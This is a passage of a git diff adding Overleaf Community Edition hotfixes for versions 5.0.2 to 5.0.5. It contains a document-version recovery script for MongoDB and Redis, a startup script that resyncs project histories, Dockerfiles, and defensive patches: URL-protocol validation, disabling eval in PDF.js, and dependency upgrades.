+ console.log('ERR', JSON.stringify(err.message)) + return cb(err) +@@ -195,17 +195,8 @@ function checkAndClear(project, callback) { + ) + } + +-// find all the broken projects from the failure records +-const errorsToResync = [ +- 'Error: history store a non-success status code: 422', +- 'OError: history store a non-success status code: 422', +- 'OpsOutOfOrderError: project structure version out of order', +-] +- + async function main() { +- const results = await db.projectHistoryFailures +- .find({ error: { $in: errorsToResync } }) +- .toArray() ++ const results = await db.projectHistoryFailures.find().toArray() + + console.log('number of queues without history store 442 =', results.length) + // now check if the project is truly deleted in mongo diff --git a/server-ce/hotfix/5.0.2/recover_doc_versions.js b/server-ce/hotfix/5.0.2/recover_doc_versions.js new file mode 100644 index 0000000..32e1dde --- /dev/null +++ b/server-ce/hotfix/5.0.2/recover_doc_versions.js @@ -0,0 +1,243 @@ +const fsPromises = require('fs/promises') +const { ObjectId } = require('mongodb') +const BPromise = require('bluebird') +const logger = require('@overleaf/logger') +const mongodb = require('../lib/mongodb') +const { chunkStore } = require('..') +const Events = require('events') + +// Silence warning. +Events.setMaxListeners(20) + +const BATCH_SIZE = 1000 +const OPTIONS = { + concurrency: parseInt(process.env.DOC_VERSION_RECOVERY_CONCURRENCY, 10) || 20, + force: process.env.DOC_VERSION_RECOVERY_FORCE === 'true', + 'skip-history-failures': + process.env.DOC_VERSION_RECOVERY_SKIP_HISTORY_FAILURES === 'true', + 'resyncs-needed-file': process.env.DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE, +} + +const db = { + deletedProjects: mongodb.db.collection('deletedProjects'), + docs: mongodb.db.collection('docs'), + migrations: mongodb.db.collection('migrations'), + projects: mongodb.db.collection('projects'), +} + +const BAD_MIGRATION_NAME = + '20231219081700_move_doc_versions_from_docops_to_docs' + +let loggingChain = Promise.resolve() +const projectIdsThatNeedResyncing = [] + +async function flushLogQueue() { + const logPath = OPTIONS['resyncs-needed-file'] + loggingChain = loggingChain.then(async () => { + const batch = projectIdsThatNeedResyncing.splice(0) + if (batch.length === 0) return + try { + await fsPromises.appendFile(logPath, batch.join('\n') + '\n') + } catch (err) { + projectIdsThatNeedResyncing.push(...batch) + logger.err({ err, logPath, batch }, 'Failed to write to log file') + } + }) + await loggingChain +} +async function recordProjectNeedsResync(projectId) { + if (OPTIONS['resyncs-needed-file']) { + projectIdsThatNeedResyncing.push(projectId) + await flushLogQueue() + } else { + console.log(`Project ${projectId} needs a hard resync.`) + } +} + +async function main() { + const badMigration = await db.migrations.findOne({ name: BAD_MIGRATION_NAME }) + if (OPTIONS.force || badMigration != null) { + console.warn('Need to recover doc versions. This will take a while.') + await runRecovery() + } + await db.migrations.deleteOne({ name: BAD_MIGRATION_NAME }) + console.log('Done.') +} + +async function runRecovery() { + let batch = [] + const summary = { + updated: 0, + ignored: 0, + skipped: 0, + deletedUpdated: 0, + deletedIgnored: 0, + } + const processBatchAndLogProgress = async () => { + try { + await BPromise.map(batch, project => processProject(project, summary), { + concurrency: OPTIONS.concurrency, + }) + } finally { + console.log(`${summary.updated} projects updated`) + console.log(`${summary.ignored} projects had good versions`) + console.log(`${summary.deletedUpdated} deleted projects updated`) + console.log( + `${summary.deletedIgnored} deleted projects had good versions` + ) + console.log(`${summary.skipped} projects skipped`) + } + batch = [] + } + + await printDBStats() + await touchResyncsNeededFile() + for await (const project of getProjects()) { + batch.push(project) + if (batch.length >= BATCH_SIZE) { + await processBatchAndLogProgress() + } + } + + for await (const deletedProject of getDeletedProjects()) { + const project = deletedProject.project + project.isDeleted = true + batch.push(project) + if (batch.length >= BATCH_SIZE) { + await processBatchAndLogProgress() + } + } + + if (batch.length > 0) { + await processBatchAndLogProgress() + } + + await backfillMissingVersions() +} + +async function printDBStats() { + const projects = await db.projects.estimatedDocumentCount() + const docs = await db.docs.estimatedDocumentCount() + console.log( + `Need to check ${projects} projects with a total of ${docs} docs.` + ) +} + +async function touchResyncsNeededFile() { + if (OPTIONS['resyncs-needed-file']) { + await fsPromises.appendFile(OPTIONS['resyncs-needed-file'], '') + } +} + +function getProjects() { + return db.projects.find({}, { projection: { _id: 1, overleaf: 1 } }) +} + +function getDeletedProjects() { + return db.deletedProjects.find( + { project: { $ne: null } }, + { projection: { 'project._id': 1, 'project.overleaf': 1 } } + ) +} + +async function processProject(project, summary) { + const projectId = project._id.toString() + let updated = false + try { + const historyDocVersions = await getHistoryDocVersions(project) + + for (const { docId, version } of historyDocVersions) { + const update = await fixMongoDocVersion(docId, version) + if (update != null) { + updated = true + } + } + + if (project.isDeleted) { + if (updated) { + summary.deletedUpdated += 1 + } else { + summary.deletedIgnored += 1 + } + } else { + await recordProjectNeedsResync(projectId) + if (updated) { + summary.updated += 1 + } else { + summary.ignored += 1 + } + } + } catch (err) { + logger.error({ err, projectId }, 'Failed to process project') + if (OPTIONS['skip-history-failures']) { + summary.skipped += 1 + } else { + throw err + } + } +} + +async function getHistoryDocVersions(project) { + const historyId = project.overleaf.history.id + const chunk = await chunkStore.loadLatest(historyId) + if (chunk == null) { + return [] + } + + const snapshot = chunk.getSnapshot() + const changes = chunk.getChanges() + snapshot.applyAll(changes) + const v2DocVersions = snapshot.getV2DocVersions() + if (v2DocVersions == null) { + return [] + } + return Object.entries(v2DocVersions.data).map(([docId, versionInfo]) => ({ + docId, + version: versionInfo.v, + })) +} + +async function fixMongoDocVersion(docId, historyVersion) { + const docBeforeUpdate = await db.docs.findOneAndUpdate( + { + _id: new ObjectId(docId), + $or: [ + { version: { $lte: historyVersion } }, + { version: { $exists: false } }, + ], + }, + { $set: { version: historyVersion + 1 } } + ) + if (docBeforeUpdate != null) { + return { + previousVersion: docBeforeUpdate.version, + newVersion: historyVersion + 1, + } + } else { + return null + } +} + +/** + * Set all remaining versions to 0 + */ +async function backfillMissingVersions() { + console.log('Defaulting version to 0 for remaining docs.') + await db.docs.updateMany( + { version: { $exists: false } }, + { $set: { version: 0 } } + ) +} + +main() + .finally(async () => { + console.log('Flushing log queue.') + await flushLogQueue() + }) + .then(() => { + process.exit(0) + }) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/server-ce/hotfix/5.0.3/910_initiate_doc_version_recovery b/server-ce/hotfix/5.0.3/910_initiate_doc_version_recovery new file mode 100755 index 0000000..b5f9ce2 --- /dev/null +++ b/server-ce/hotfix/5.0.3/910_initiate_doc_version_recovery @@ -0,0 +1,51 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +source /etc/overleaf/env.sh + +LOG_FILE=/var/lib/overleaf/data/history/doc-version-recovery.log +RESYNCS_NEEDED_FILE=/var/lib/overleaf/data/history/doc-version-recovery-resyncs-5.0.3.log + +echo "Checking for doc version recovery. This can take a while if needed. Logs are in $LOG_FILE" +cd /overleaf/services/history-v1 +LOG_LEVEL=info DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE="$RESYNCS_NEEDED_FILE" node storage/scripts/recover_doc_versions.js 2>&1 | tee -a "$LOG_FILE" + +function resyncAllProjectsInBackground() { + waitForService docstore 3016 + waitForService document-updater 3003 + waitForService filestore 3009 + waitForService history-v1 3100 + waitForService project-history 3054 + waitForService web-api 4000 + + # Resync files that had their versions updated + while read -r project_id; do + echo "Resyncing project $project_id..." + curl -X POST --silent "http://127.0.0.1:3054/project/$project_id/resync?force=true" + done < "$RESYNCS_NEEDED_FILE" + + # Resync files that have broken histories + /overleaf/bin/force-history-resyncs + + echo "Finished resyncing history for all projects. Adding .done suffix to log file" + mv "$RESYNCS_NEEDED_FILE" "$RESYNCS_NEEDED_FILE.done" +} + +function waitForService() { + local name=$1 + local port=$2 + while ! curl --fail --silent "http://127.0.0.1:$port/status"; do + echo "Waiting for $name service to start up" + sleep 10 + done +} + +if [ -f "$RESYNCS_NEEDED_FILE" ]; then + echo "Finished recovery of doc versions. Resyncing history for all projects in the background." + resyncAllProjectsInBackground & +else + echo "No recovery of doc versions needed." +fi + diff --git a/server-ce/hotfix/5.0.3/Dockerfile b/server-ce/hotfix/5.0.3/Dockerfile new file mode 100644 index 0000000..79be043 --- /dev/null +++ b/server-ce/hotfix/5.0.3/Dockerfile @@ -0,0 +1,7 @@ +FROM sharelatex/sharelatex:5.0.2-RC6 + +# Patch: https://github.com/overleaf/internal/pull/18065 +RUN npm install @overleaf/redis-wrapper @overleaf/settings -w services/history-v1 +ADD 910_initiate_doc_version_recovery /etc/my_init.d/910_initiate_doc_version_recovery +COPY pr_18065.patch . +RUN patch -p0 < pr_18065.patch && rm pr_18065.patch diff --git a/server-ce/hotfix/5.0.3/pr_18065.patch b/server-ce/hotfix/5.0.3/pr_18065.patch new file mode 100644 index 0000000..4fe440f --- /dev/null +++ b/server-ce/hotfix/5.0.3/pr_18065.patch @@ -0,0 +1,307 @@ +--- services/history-v1/storage/scripts/recover_doc_versions.js ++++ services/history-v1/storage/scripts/recover_doc_versions.js +@@ -2,6 +2,10 @@ const fsPromises = require('fs/promises') + const { ObjectId } = require('mongodb') + const BPromise = require('bluebird') + const logger = require('@overleaf/logger') ++const Settings = require('@overleaf/settings') ++const rclient = require('@overleaf/redis-wrapper').createClient( ++ Settings.redis.documentupdater ++) + const mongodb = require('../lib/mongodb') + const { chunkStore } = require('..') + const Events = require('events') +@@ -28,8 +32,14 @@ const db = { + const BAD_MIGRATION_NAME = + '20231219081700_move_doc_versions_from_docops_to_docs' + ++const RECOVERY_FILES_502 = [ ++ '/var/lib/overleaf/data/history/doc-version-recovery-resyncs.log', ++ '/var/lib/overleaf/data/history/doc-version-recovery-resyncs.log.done', ++] ++ + let loggingChain = Promise.resolve() + const projectIdsThatNeedResyncing = [] ++const unflushedDocIds = new Set() + + async function flushLogQueue() { + const logPath = OPTIONS['resyncs-needed-file'] +@@ -55,23 +65,67 @@ async function recordProjectNeedsResync(projectId) { + } + + async function main() { ++ const recovery502Ran = await did502RecoveryRun() ++ await getUnflushedDocIds() + const badMigration = await db.migrations.findOne({ name: BAD_MIGRATION_NAME }) +- if (OPTIONS.force || badMigration != null) { ++ ++ if (unflushedDocIds.size > 0 && !recovery502Ran && badMigration != null) { ++ // Tell customers that they need to flush ++ console.log(` ++-------------------------------------------------------------------- ++Detected unflushed changes while recovering doc versions. ++Please go back to version 5.0.1 and follow the recovery procedure ++for flushing document updates: ++ ++https://github.com/overleaf/overleaf/wiki/Doc-version-recovery ++--------------------------------------------------------------------`) ++ process.exit(1) ++ } ++ ++ if (OPTIONS.force || recovery502Ran || badMigration != null) { + console.warn('Need to recover doc versions. This will take a while.') + await runRecovery() ++ await db.migrations.deleteOne({ name: BAD_MIGRATION_NAME }) ++ await delete502RecoveryFiles() + } +- await db.migrations.deleteOne({ name: BAD_MIGRATION_NAME }) ++ + console.log('Done.') + } + ++async function did502RecoveryRun() { ++ for (const file of RECOVERY_FILES_502) { ++ try { ++ await fsPromises.stat(file) ++ return true ++ } catch (err) { ++ // file doesn't exist. continue ++ } ++ } ++ return false ++} ++ ++async function delete502RecoveryFiles() { ++ for (const file of RECOVERY_FILES_502) { ++ try { ++ await fsPromises.rename(file, file.replace('.log', '-5.0.2.log')) ++ } catch (err) { ++ // file doesn't exist. continue ++ } ++ } ++} ++ + async function runRecovery() { + let batch = [] + const summary = { +- updated: 0, + ignored: 0, + skipped: 0, +- deletedUpdated: 0, ++ deletedUpdatedMongo: 0, ++ deletedUpdatedRedis: 0, ++ deletedUpdatedBoth: 0, + deletedIgnored: 0, ++ updatedMongo: 0, ++ updatedRedis: 0, ++ updatedBoth: 0, + } + const processBatchAndLogProgress = async () => { + try { +@@ -79,9 +133,21 @@ async function runRecovery() { + concurrency: OPTIONS.concurrency, + }) + } finally { +- console.log(`${summary.updated} projects updated`) ++ console.log(`${summary.updatedRedis} projects updated in Redis`) ++ console.log(`${summary.updatedMongo} projects updated in Mongo`) ++ console.log( ++ `${summary.updatedBoth} projects updated in both Mongo and Redis` ++ ) + console.log(`${summary.ignored} projects had good versions`) +- console.log(`${summary.deletedUpdated} deleted projects updated`) ++ console.log( ++ `${summary.deletedUpdatedMongo} deleted projects updated in Mongo` ++ ) ++ console.log( ++ `${summary.deletedUpdatedRedis} deleted projects updated in Redis` ++ ) ++ console.log( ++ `${summary.deletedUpdatedBoth} deleted projects updated in both Mongo and Redis` ++ ) + console.log( + `${summary.deletedIgnored} deleted projects had good versions` + ) +@@ -91,7 +157,7 @@ async function runRecovery() { + } + + await printDBStats() +- await touchResyncsNeededFile() ++ await initResyncsNeededFile() + for await (const project of getProjects()) { + batch.push(project) + if (batch.length >= BATCH_SIZE) { +@@ -115,17 +181,38 @@ async function runRecovery() { + await backfillMissingVersions() + } + ++async function getUnflushedDocIds() { ++ const batchSize = 1000 ++ let cursor = '0' ++ do { ++ const [newCursor, keys] = await rclient.scan( ++ cursor, ++ 'MATCH', ++ Settings.redis.documentupdater.key_schema.docVersion({ doc_id: '*' }), ++ 'COUNT', ++ batchSize ++ ) ++ for (const key of keys) { ++ unflushedDocIds.add(key.slice('DocVersion:'.length)) ++ } ++ cursor = newCursor ++ } while (cursor !== '0') ++} ++ + async function printDBStats() { + const projects = await db.projects.estimatedDocumentCount() ++ const deletedProjects = await db.deletedProjects.countDocuments() + const docs = await db.docs.estimatedDocumentCount() + console.log( +- `Need to check ${projects} projects with a total of ${docs} docs.` ++ `Need to check ${projects} projects and up-to ${deletedProjects} deleted projects with a total of ${docs} docs.` + ) + } + +-async function touchResyncsNeededFile() { +- if (OPTIONS['resyncs-needed-file']) { +- await fsPromises.appendFile(OPTIONS['resyncs-needed-file'], '') ++async function initResyncsNeededFile() { ++ const logPath = OPTIONS['resyncs-needed-file'] ++ if (logPath) { ++ await fsPromises.writeFile(logPath, '') ++ await fsPromises.rm(`${logPath}.done`, { force: true }) + } + } + +@@ -135,34 +222,47 @@ function getProjects() { + + function getDeletedProjects() { + return db.deletedProjects.find( +- { project: { $ne: null } }, ++ { 'project.overleaf.history.id': { $exists: true } }, + { projection: { 'project._id': 1, 'project.overleaf': 1 } } + ) + } + + async function processProject(project, summary) { + const projectId = project._id.toString() +- let updated = false ++ let updatedMongo = false ++ let updatedRedis = false + try { + const historyDocVersions = await getHistoryDocVersions(project) + + for (const { docId, version } of historyDocVersions) { +- const update = await fixMongoDocVersion(docId, version) ++ const update = await fixDocVersion(docId, version) + if (update != null) { +- updated = true ++ if (update.in === 'mongo') { ++ updatedMongo = true ++ } else if (update.in === 'redis') { ++ updatedRedis = true ++ } + } + } + + if (project.isDeleted) { +- if (updated) { +- summary.deletedUpdated += 1 ++ if (updatedMongo && updatedRedis) { ++ summary.deletedUpdatedBoth += 1 ++ } else if (updatedMongo) { ++ summary.deletedUpdatedMongo += 1 ++ } else if (updatedRedis) { ++ summary.deletedUpdatedRedis += 1 + } else { + summary.deletedIgnored += 1 + } + } else { + await recordProjectNeedsResync(projectId) +- if (updated) { +- summary.updated += 1 ++ if (updatedMongo && updatedRedis) { ++ summary.updatedBoth += 1 ++ } else if (updatedMongo) { ++ summary.updatedMongo += 1 ++ } else if (updatedRedis) { ++ summary.updatedRedis += 1 + } else { + summary.ignored += 1 + } +@@ -197,25 +297,61 @@ async function getHistoryDocVersions(project) { + })) + } + +-async function fixMongoDocVersion(docId, historyVersion) { +- const docBeforeUpdate = await db.docs.findOneAndUpdate( +- { +- _id: new ObjectId(docId), +- $or: [ +- { version: { $lte: historyVersion } }, +- { version: { $exists: false } }, +- ], +- }, +- { $set: { version: historyVersion + 1 } } +- ) +- if (docBeforeUpdate != null) { ++async function fixDocVersion(docId, historyVersion) { ++ const redisVersion = await getRedisDocVersion(docId) ++ if (redisVersion != null && historyVersion >= redisVersion) { ++ await setRedisDocVersion(docId, historyVersion + 1) + return { +- previousVersion: docBeforeUpdate.version, ++ in: 'redis', ++ previousVersion: redisVersion, + newVersion: historyVersion + 1, + } + } else { ++ const docBeforeUpdate = await db.docs.findOneAndUpdate( ++ { ++ _id: new ObjectId(docId), ++ $or: [ ++ { version: { $lte: historyVersion } }, ++ { version: { $exists: false } }, ++ ], ++ }, ++ { $set: { version: historyVersion + 1 } }, ++ { projection: { _id: 1, version: 1 } } ++ ) ++ ++ if (docBeforeUpdate != null) { ++ return { ++ in: 'mongo', ++ previousVersion: docBeforeUpdate.version, ++ newVersion: historyVersion + 1, ++ } ++ } else { ++ return null ++ } ++ } ++} ++ ++async function getRedisDocVersion(docId) { ++ if (!unflushedDocIds.has(docId)) { + return null + } ++ const result = await rclient.get( ++ Settings.redis.documentupdater.key_schema.docVersion({ doc_id: docId }) ++ ) ++ if (result == null) { ++ return null ++ } ++ return parseInt(result, 10) ++} ++ ++async function setRedisDocVersion(docId, version) { ++ const multi = rclient.multi() ++ multi.set( ++ Settings.redis.documentupdater.key_schema.docVersion({ doc_id: docId }), ++ version ++ ) ++ multi.set(`UnflushedTime:{${docId}}`, Date.now(), 'NX') ++ await multi.exec() + } + + /** diff --git a/server-ce/hotfix/5.0.4/Dockerfile b/server-ce/hotfix/5.0.4/Dockerfile new file mode 100644 index 0000000..e5def9d --- /dev/null +++ b/server-ce/hotfix/5.0.4/Dockerfile @@ -0,0 +1,30 @@ +FROM sharelatex/sharelatex:5.0.3 + +# apply an override to the swagger-tools package to force security updates to multer and qs +# from https://github.com/overleaf/internal/pull/18433 +COPY pr_18433.patch . +RUN patch -p1 < pr_18433.patch && rm pr_18433.patch +RUN npm install --include-workspace-root -w services/history-v1 swagger-tools@0.10.4 && rm -rf /root/.cache /root/.npm $(find /tmp/ -mindepth 1 -maxdepth 1) + +# remove google-cloud packages which are unused in server-pro have a vulnerable dependency +RUN npm uninstall -w libraries/logger @google-cloud/logging-bunyan +RUN npm uninstall -w libraries/metrics @google-cloud/opentelemetry-cloud-trace-exporter @google-cloud/profiler + +# the passport-twitter package has been removed from the monorepo +RUN npm uninstall -w services/web passport-twitter + +# remove the unused services/web/scripts/translations directory +RUN rm -r services/web/scripts/translations + +# Validate URL protocol before opening from Visual Editor tooltip +# from https://github.com/overleaf/internal/pull/18393 +COPY pr_18393.patch . +RUN patch -p1 < pr_18393.patch && rm pr_18393.patch + +# Set isEvalSupported to false when loading a PDF document +# from https://github.com/overleaf/internal/pull/18444 +COPY pr_18444.patch . +RUN patch -p1 < pr_18444.patch && rm pr_18444.patch + +# ensure that the vulnerability audit is run after all changes +RUN npm audit --audit-level=high diff --git a/server-ce/hotfix/5.0.4/pr_18393.patch b/server-ce/hotfix/5.0.4/pr_18393.patch new file mode 100644 index 0000000..13da910 --- /dev/null +++ b/server-ce/hotfix/5.0.4/pr_18393.patch @@ -0,0 +1,111 @@ +diff --git a/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx b/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx +index a0d681d9cb5..2f9a4333cd6 100644 +--- a/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx ++++ b/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx +@@ -17,6 +17,7 @@ import { + import { Button, ControlLabel, FormControl, FormGroup } from 'react-bootstrap' + import Icon from '../../../../shared/components/icon' + import { EditorState } from '@codemirror/state' ++import { openURL } from '@/features/source-editor/utils/url' + + export const HrefTooltipContent: FC = () => { + const state = useCodeMirrorStateContext() +@@ -108,7 +109,7 @@ export const HrefTooltipContent: FC = () => { + className="ol-cm-command-tooltip-link" + onClick={() => { + // TODO: unescape content +- window.open(url, '_blank') ++ openURL(url) + }} + > + +diff --git a/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx b/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx +index c51b497de01..632d71dd031 100644 +--- a/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx ++++ b/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx +@@ -9,6 +9,7 @@ import { + } from '../../lezer-latex/latex.terms.mjs' + import Icon from '../../../../shared/components/icon' + import { EditorState } from '@codemirror/state' ++import { openURL } from '@/features/source-editor/utils/url' + + export const UrlTooltipContent: FC = () => { + const { t } = useTranslation() +@@ -23,7 +24,7 @@ export const UrlTooltipContent: FC = () => { + onClick={() => { + const url = readUrl(state) + if (url) { +- window.open(url, '_blank') ++ openURL(url) + } + }} + > +diff --git a/services/web/frontend/js/features/source-editor/utils/url.ts b/services/web/frontend/js/features/source-editor/utils/url.ts +new file mode 100644 +index 00000000000..8bfc9bdeab8 +--- /dev/null ++++ b/services/web/frontend/js/features/source-editor/utils/url.ts +@@ -0,0 +1,11 @@ ++const ALLOWED_PROTOCOLS = ['https:', 'http:'] ++ ++export const openURL = (content: string) => { ++ const url = new URL(content, document.location.href) ++ ++ if (!ALLOWED_PROTOCOLS.includes(url.protocol)) { ++ throw new Error(`Not opening URL with protocol ${url.protocol}`) ++ } ++ ++ window.open(url, '_blank') ++} +diff --git a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx +index 837f90a64ab..d46b522a116 100644 +--- a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx ++++ b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx +@@ -54,8 +54,8 @@ describe(' command tooltip in Visual mode', function () { + // open the link + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@window-open').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/'), + '_blank' + ) + +@@ -112,8 +112,8 @@ describe(' command tooltip in Visual mode', function () { + // open the link + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@window-open').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/'), + '_blank' + ) + }) +diff --git a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx +index c6e28f9eeeb..106a80ba187 100644 +--- a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx ++++ b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx +@@ -42,8 +42,8 @@ describe(' tooltips in Visual mode', function () { + }) + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@open-window').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com/foo', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/foo'), + '_blank' + ) + cy.findByRole('button', { name: 'Remove link' }).click() +@@ -62,8 +62,8 @@ describe(' tooltips in Visual mode', function () { + }) + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@open-window').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/'), + '_blank' + ) + }) diff --git a/server-ce/hotfix/5.0.4/pr_18433.patch b/server-ce/hotfix/5.0.4/pr_18433.patch new file mode 100644 index 0000000..1e14f23 --- /dev/null +++ b/server-ce/hotfix/5.0.4/pr_18433.patch @@ -0,0 +1,63 @@ +diff --git a/package-lock.json b/package-lock.json +index b9eba6086b..bb1a5cebaf 100644 +--- a/package-lock.json ++++ b/package-lock.json +@@ -70674,8 +70674,7 @@ + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" + }, + "multer": { +- "version": "1.4.4", +- "resolved": "https://registry.npmjs.org/multer/-/multer-1.4.4.tgz", ++ "version": "https://registry.npmjs.org/multer/-/multer-1.4.4.tgz", + "integrity": "sha512-2wY2+xD4udX612aMqMcB8Ws2Voq6NIUPEtD1be6m411T4uDH/VtL9i//xvcyFlTVfRdaBsk7hV5tgrGQqhuBiw==", + "requires": { + "append-field": "^1.0.0", +@@ -76995,10 +76994,10 @@ + "js-yaml": "^3.3.1", + "json-refs": "^3.0.2", + "lodash": "^4.17.4", +- "multer": "^1.1.0", ++ "multer": "1.4.5-lts.1", + "parseurl": "^1.3.0", + "path-to-regexp": "^2.0.0", +- "qs": "^6.0.3", ++ "qs": "6.5.3", + "serve-static": "^1.10.0", + "spark-md5": "^3.0.0", + "superagent": "^3.5.2", +@@ -77035,7 +77034,7 @@ + "http-errors": "~1.6.2", + "iconv-lite": "0.4.19", + "on-finished": "~2.3.0", +- "qs": "6.5.1", ++ "qs": "6.5.3", + "raw-body": "2.3.2", + "type-is": "~1.6.15" + }, +@@ -77109,8 +77108,7 @@ + "integrity": "sha512-G6zHoVqC6GGTQkZwF4lkuEyMbVOjoBKAEybQUypI1WTkqinCOrq2x6U2+phkJ1XsEMTy4LjtwPI7HW+NVrRR2w==" + }, + "qs": { +- "version": "6.5.1", +- "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.1.tgz", ++ "version": "https://registry.npmjs.org/qs/-/qs-6.5.1.tgz", + "integrity": "sha512-eRzhrN1WSINYCDCbrz796z37LOe3m5tmW7RQf6oBntukAG1nmovJvhnwHHRMAfeoItc1m2Hk02WER2aQ/iqs+A==" + }, + "raw-body": { +diff --git a/package.json b/package.json +index f092472caf..329d4fc5ce 100644 +--- a/package.json ++++ b/package.json +@@ -1,6 +1,12 @@ + { + "name": "overleaf", + "private": true, ++ "overrides": { ++ "swagger-tools": { ++ "multer": "1.4.5-lts.1", ++ "qs": "6.5.3" ++ } ++ }, + "dependencies": { + "patch-package": "^8.0.0" + }, diff --git a/server-ce/hotfix/5.0.4/pr_18444.patch b/server-ce/hotfix/5.0.4/pr_18444.patch new file mode 100644 index 0000000..6e36129 --- /dev/null +++ b/server-ce/hotfix/5.0.4/pr_18444.patch @@ -0,0 +1,41 @@ +diff --git a/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx b/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx +index 4d3b80bb9a2..3efc61a2199 100644 +--- a/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx ++++ b/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx +@@ -33,7 +33,10 @@ const FileViewPdf: FC<{ + return + } + +- const pdf = await PDFJS.getDocument(preview.url).promise ++ const pdf = await PDFJS.getDocument({ ++ url: preview.url, ++ isEvalSupported: false, ++ }).promise + + // bail out if loading the PDF took too long + if (!mountedRef.current) { +diff --git a/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js b/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js +index 9b419b1397f..6a92630a215 100644 +--- a/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js ++++ b/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js +@@ -96,6 +96,7 @@ export default class PDFJSWrapper { + rangeChunkSize, + disableAutoFetch: true, + disableStream, ++ isEvalSupported: false, + textLayerMode: 2, // PDFJSViewer.TextLayerMode.ENABLE, + range: rangeTransport, + }) +diff --git a/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts b/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts +index 7321f9e02b5..f6c744aaec2 100644 +--- a/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts ++++ b/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts +@@ -143,7 +143,7 @@ export class GraphicsWidget extends WidgetType { + return + } + +- const pdf = await PDFJS.getDocument(url).promise ++ const pdf = await PDFJS.getDocument({ url, isEvalSupported: false }).promise + const page = await pdf.getPage(1) + + // bail out if loading the PDF took too long diff --git a/server-ce/hotfix/5.0.5/Dockerfile b/server-ce/hotfix/5.0.5/Dockerfile new file mode 100644 index 0000000..b9ad108 --- /dev/null +++ b/server-ce/hotfix/5.0.5/Dockerfile @@ -0,0 +1,12 @@ +FROM sharelatex/sharelatex:5.0.4 + +# Install dev dependencies as part of "genScript compile" +COPY pr_18570.patch . +RUN patch -p1 < pr_18570.patch && rm pr_18570.patch + +# Adopted from https://github.com/overleaf/internal/pull/18819 +COPY pr_18819.patch . +RUN patch -p1 < pr_18819.patch && rm pr_18819.patch + +# Recompile frontend assets +RUN node genScript compile | bash diff --git a/server-ce/hotfix/5.0.5/pr_18570.patch b/server-ce/hotfix/5.0.5/pr_18570.patch new file mode 100644 index 0000000..05bc9f5 --- /dev/null +++ b/server-ce/hotfix/5.0.5/pr_18570.patch @@ -0,0 +1,30 @@ +--- a/genScript.js ++++ b/genScript.js +@@ -5,16 +5,26 @@ console.log('set -ex') + + switch (process.argv.pop()) { + case 'install': +- console.log('npm ci') ++ console.log('npm install --omit=dev') + break + case 'compile': + for (const service of services) { + console.log('pushd', `services/${service.name}`) + switch (service.name) { + case 'web': ++ // Avoid downloading of cypress ++ console.log('export CYPRESS_INSTALL_BINARY=0') ++ ++ // install webpack and frontend dependencies ++ console.log('npm install --include=dev') ++ // install misplaced dependencies (fixed via 18389) ++ console.log('pushd ../../ && npm install --include=dev --workspaces=false && popd') ++ // run webpack + console.log('npm run webpack:production') + // drop webpack/babel cache + console.log('rm -rf node_modules/.cache') ++ // uninstall webpack and frontend dependencies ++ console.log('pushd ../../ && npm install --omit=dev && popd') + break + default: + console.log(`echo ${service.name} does not require a compilation`) diff --git a/server-ce/hotfix/5.0.5/pr_18819.patch b/server-ce/hotfix/5.0.5/pr_18819.patch new file mode 100644 index 0000000..8352565 --- /dev/null +++ b/server-ce/hotfix/5.0.5/pr_18819.patch @@ -0,0 +1,17 @@ +--- a/services/web/frontend/js/features/mathjax/load-mathjax.ts ++++ b/services/web/frontend/js/features/mathjax/load-mathjax.ts +@@ -64,6 +64,15 @@ 